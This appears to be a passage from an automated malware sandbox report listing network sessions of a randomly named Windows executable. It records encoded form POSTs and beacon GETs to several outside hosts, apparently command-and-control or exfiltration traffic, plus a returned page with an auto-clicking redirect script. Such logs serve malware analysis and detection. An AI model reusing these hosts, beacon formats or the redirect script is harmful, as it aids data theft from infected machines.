                                                                Data Ascii: 6dr=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkhDg41ncr6fZd0TpSFplS1sJ4zJFFGQgFH1Awcz3M0fW+vLOvsMfN/uuRjajnwk2w7BpZHH63qNnC/4DmMU/lKSfjxcLcqj84DOhQtlCmhEeGZBFP+iS6VezUoYI+x6UCXnsJUtF2n2ZST1Gvth58qNeSVlsrxguAKPQG69C0uQy9UKylVIUFpNYcf93MFxKIWTnLQ8VCI4PryojYy2lluIIESYrE6a4taxQeUKBUM983ztVzhapZ/0dwrTJphaZq+tKLU4kk1L0+xr+RaXqHYfB+j8vQaIj0nkiKAfqef3oLNV2oKQ0RdBmqWtZYQoo9GxGno1ZtRT9lKVUvh+5ELiUKgsBfSwQ4pE3yI4mubtAZ027M9XIjd5qT2b0sfP4QcPruNgXNZ9BoiMcVwEcMzxZg3FiSuZDh98PP06kT6uf5GJbxBLUVvTVhxyWwU+6s/BzfVlTaxKKTfjBaWtA/cxhOyF1tTkSpsDCUckz8EBhqc0QxDTS87/BIKO2IOvazStVBFHMNQz5okuWX+Ehe54tRs9sw1gIiPfTnz0pOMH3lDW5rxMufwC1mzF1VQ8SolEI1e8xYwYLC4oYdEJ2eSKzwybOIsKGqQQ2rncXH2ZKpKXmbSuGhPz9bmq6wCEnfw8xk9quaVdtyxgtgidCbZk2q44Xoqwn0UTnc3T8qFiVIdL9YupKyM8pPSqRZN2e3IgI/nLDHAo/UIRVwmnRFDzMvj9K/K9YNolQo310NgkgQ8NEXRI/PZTZS8CZllUnheh0UA2Myorh6CfaJoQUMT1ednu4cqGPfkHmERv1Aivhxv4XleXId6x4AiVArhjS [TRUNCATED]
                                                                Nov 27, 2024 08:54:08.549874067 CET525INHTTP/1.1 200 OK
                                                                Server: Apache
                                                                Content-Type: text/html; charset=utf-8
                                                                Accept-Ranges: bytes
                                                                Cache-Control: max-age=86400
                                                                Age: 1
                                                                Connection: Close
                                                                Content-Length: 350
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.64983827.124.4.246804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:09.854370117 CET498OUTGET /sgdd/?6dr=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.laohub10.net
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:54:11.242377996 CET525INHTTP/1.1 200 OK
                                                                Server: Apache
                                                                Content-Type: text/html; charset=utf-8
                                                                Accept-Ranges: bytes
                                                                Cache-Control: max-age=86400
                                                                Age: 1
                                                                Connection: Close
                                                                Content-Length: 350
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.649858149.88.81.190804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:17.709693909 CET749OUTPOST /rq1s/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Origin: http://www.xcvbj.asia
                                                                Referer: http://www.xcvbj.asia/rq1s/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6c 47 4a 4e 55 79 46 2b 6d 75 79 76 6d 68 68 7a 42 53 64 4d 63 33 4e 4b 36 55 76 66 69 4a 71 2f 4a 67 48 4f 42 75 2b 62 63 38 30
                                                                Data Ascii: 6dr=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJlGJNUyF+muyvmhhzBSdMc3NK6UvfiJq/JgHOBu+bc80


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.649865149.88.81.190804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:20.384290934 CET773OUTPOST /rq1s/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Origin: http://www.xcvbj.asia
                                                                Referer: http://www.xcvbj.asia/rq1s/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 50 4b 34 4d 64 66 43 4a 41 39 4a 59 48 63 57 69 5a 55 6f 5a 58 73 47 6b 39 52 72 7a 71 44 62 57 74 4c 54 64 79 41 72 5a 4c 6d 51 3d 3d
                                                                Data Ascii: 6dr=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMXPK4MdfCJA9JYHcWiZUoZXsGk9RrzqDbWtLTdyArZLmQ==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.649872149.88.81.190804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:23.048840046 CET1786OUTPOST /rq1s/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Origin: http://www.xcvbj.asia
                                                                Referer: http://www.xcvbj.asia/rq1s/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 78 2b 32 4a 38 50 6f 53 70 4d 76 51 32 51 79 33 4f 30 61 55 56 2b 47 63 4e 39 64 6c 78 59 59 56 49 53 4c 4f 34 54 43 55 57 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 39 76 76 4b 45 31 77 2b 31 4b 45 5a 4b 57 77 42 34 4f 76 43 37 4a 42 47 75 6f 30 35 7a 69 68 38 6c 6f 7a 41 67 38 64 6a 52 2b 58 6a 51 2b 68 6a 6d 51 47 33 71 31 4f 6e 55 52 61 46 54 37 4a 39 2b 71 63 2f 2f 66 6d 75 37 43 39 64 6c 6a 57 4b 6c 46 67 [TRUNCATED]
                                                                Data Ascii: 6dr=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3Wuo0RW1x+2J8PoSpMvQ2Qy3O0aUV+GcN9dlxYYVISLO4TCUWsyMZAPxoJceoqmKYQ/keeCNo2soDFr7dd9vvKE1w+1KEZKWwB4OvC7JBGuo05zih8lozAg8djR+XjQ+hjmQG3q1OnURaFT7J9+qc//fmu7C9dljWKlFgUdCecnyvSUvEV7rOugR6Ne/76HFEvgpQzpFH0Co86RhU/v4Q7Zdukddz8rvPNLxUhhjFXZZMm+qHK+i87NS/WkSz15Zz8d9ARliYg7hwVMcjm3UpAw47iMFr4D1pMbhoeI8jY1i+XbzVELMvDY2p6OFZ35O9EEvih98uooFaGwzU3FReIU8JO1c7BUjdDZFUqYrVOk2prsjUC+C/H6+SKqr5+qdEiJdfLn+Jw389ksZqc34U5GwDrTGI391J1vqBSHUvGVrMbklVk8iItWs6oMJ3uDH8u+qK2DrJhNxaHb9ivWT70TGiLvQ+ECCf6+haa6g9D5EKFAMNnA3UNeBMkahJGWOUxvKLmagwooX//jWgpiQ+vHs8ifReyvQAIUUBlJBwlBa+lEWA06z3TV1mKA1SUbECuTdSezX/A5OhlTaeMg3Q2O5g46hcFXI56SRo3FETuKpBbs0c0HE3bUaxVcDOp/yHgWNJkRMKNpYTxc53fcUUeLtZsn/4mtzSv/+Z6sByzS5Bl4Kp0CkYUCjctVKS7rxY+0rQ8dsiJyfTY7hAOp071dJVb12uBjVoSS6Hra+y7LgrLEjOit/QslJwYUMl3RJjjTv9oQsyO79+OPb7zyEEYVwnzPeS96Ga2DZCqaduNNLmWNY/B5d2pnl/I4VT8zEZsRbDCg [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.649878149.88.81.190804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:25.716041088 CET496OUTGET /rq1s/?6dr=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.64994485.159.66.93804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:53.895574093 CET758OUTPOST /rum2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Origin: http://www.soainsaat.xyz
                                                                Referer: http://www.soainsaat.xyz/rum2/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 6f 59 63 45 46 71 32 56 6f 6a 46 32 41 2b 6b 39 74 4f 64 72 77 7a 68 79 38 7a 6c 6e 75 49 53 7a 6b 71 7a 47 6d 36 33 7a 54 57 49
                                                                Data Ascii: 6dr=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRooYcEFq2VojF2A+k9tOdrwzhy8zlnuISzkqzGm63zTWI


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.64995085.159.66.93804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:56.577236891 CET782OUTPOST /rum2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Origin: http://www.soainsaat.xyz
                                                                Referer: http://www.soainsaat.xyz/rum2/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 6a 79 2b 72 58 6e 4f 49 34 78 6b 53 7a 55 78 32 51 38 6e 7a 72 77 79 6f 34 71 7a 5a 63 47 57 49 6a 43 75 56 45 75 4c 37 79 37 41 3d 3d
                                                                Data Ascii: 6dr=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTjy+rXnOI4xkSzUx2Q8nzrwyo4qzZcGWIjCuVEuL7y7A==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.64995885.159.66.93804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:59.237972975 CET1795OUTPOST /rum2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Origin: http://www.soainsaat.xyz
                                                                Referer: http://www.soainsaat.xyz/rum2/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 64 75 70 75 42 50 6c 79 5a 48 54 67 5a 77 6b 35 6c 47 59 48 67 71 2f 39 32 66 6c 2f 48 4d 75 6f 44 4d 46 51 47 45 64 45 61 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 37 4b 52 33 74 35 52 34 4f 46 36 2f 44 65 75 44 62 59 4f 38 45 32 45 4c 50 35 74 44 4a 51 69 67 4c 5a 74 69 4b 62 65 68 5a 52 79 75 39 49 4f 36 48 44 33 6c 34 6c 31 2b 32 54 37 78 71 50 58 74 45 76 45 41 64 79 4d 43 68 64 72 42 51 4d 68 41 42 48 41 [TRUNCATED]
                                                                Data Ascii: 6dr=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4b24SOqxdupuBPlyZHTgZwk5lGYHgq/92fl/HMuoDMFQGEdEatPvoKhgts7cAYkR+T5jEFTDkR64hjQqKz7KR3t5R4OF6/DeuDbYO8E2ELP5tDJQigLZtiKbehZRyu9IO6HD3l4l1+2T7xqPXtEvEAdyMChdrBQMhABHAgx5NE3XaBGoY+Ezyvd23/+3rgkuGOjTIDU9Rd/WkO/As61dTh9muS38CvwRchcktNBPZa+pUYpFEVOKP9F4s7ecoRg9+Ebbbq7dASpVALVbS7sIOEFbCedPk36dzYfAf3OdyPs/eaRKMhFf4kJJ4xHtPDjW6VPJEgZ8Ta0cKSrUS2OeQjVHiGOtTeZFnTW3YD+myRPC/CqJKEKQ4SQomfBJw19orfHYdPLPqqz7A6/7QYv5ngoUXvyJbNJVmRXqMADQSIwpez0MzAhpTSn6riJ/94qBhpCzSPb9qKjHgBbQS+Joc7oYzJT/BQEMoKl2iNUJLLvNYweFCT2fEWlkJr59QajgANxpeiam/C15YqCrSiBdmVvMHbSZ7m92826oNA8ogth0McaVOIA6NA5P59mSl+wQg4AMwxPxOpcOzoXeoY13+wsalRI8ssyLgG274S3ftKTIWeHj+2G+IQweXn4WNnGuCzjS7YVmOmmDrIv8rv5xibIzkJStzuQI1h/yQk3UJbdYdEHL/X+BJGNOM1Gfm8NDFfT355457tKkMtOeNHjok+8iNlETm6Csd+9RzVDKFA+1SRpz2diEyEv1f1bycptdWn8/Il/y9UZj3hzcxg23umNRDUiwR98iKl5879lyFLb/nDs3ow+hAKVpXJv0MZiUKuJY1Yq [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.64996685.159.66.93804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:01.903806925 CET499OUTGET /rum2/?6dr=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:03.325696945 CET225INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.14.1
                                                                Date: Wed, 27 Nov 2024 07:55:03 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                X-Rate-Limit-Limit: 5s
                                                                X-Rate-Limit-Remaining: 19
                                                                X-Rate-Limit-Reset: 2024-11-27T07:55:08.0915773Z


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.649983185.27.134.144804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
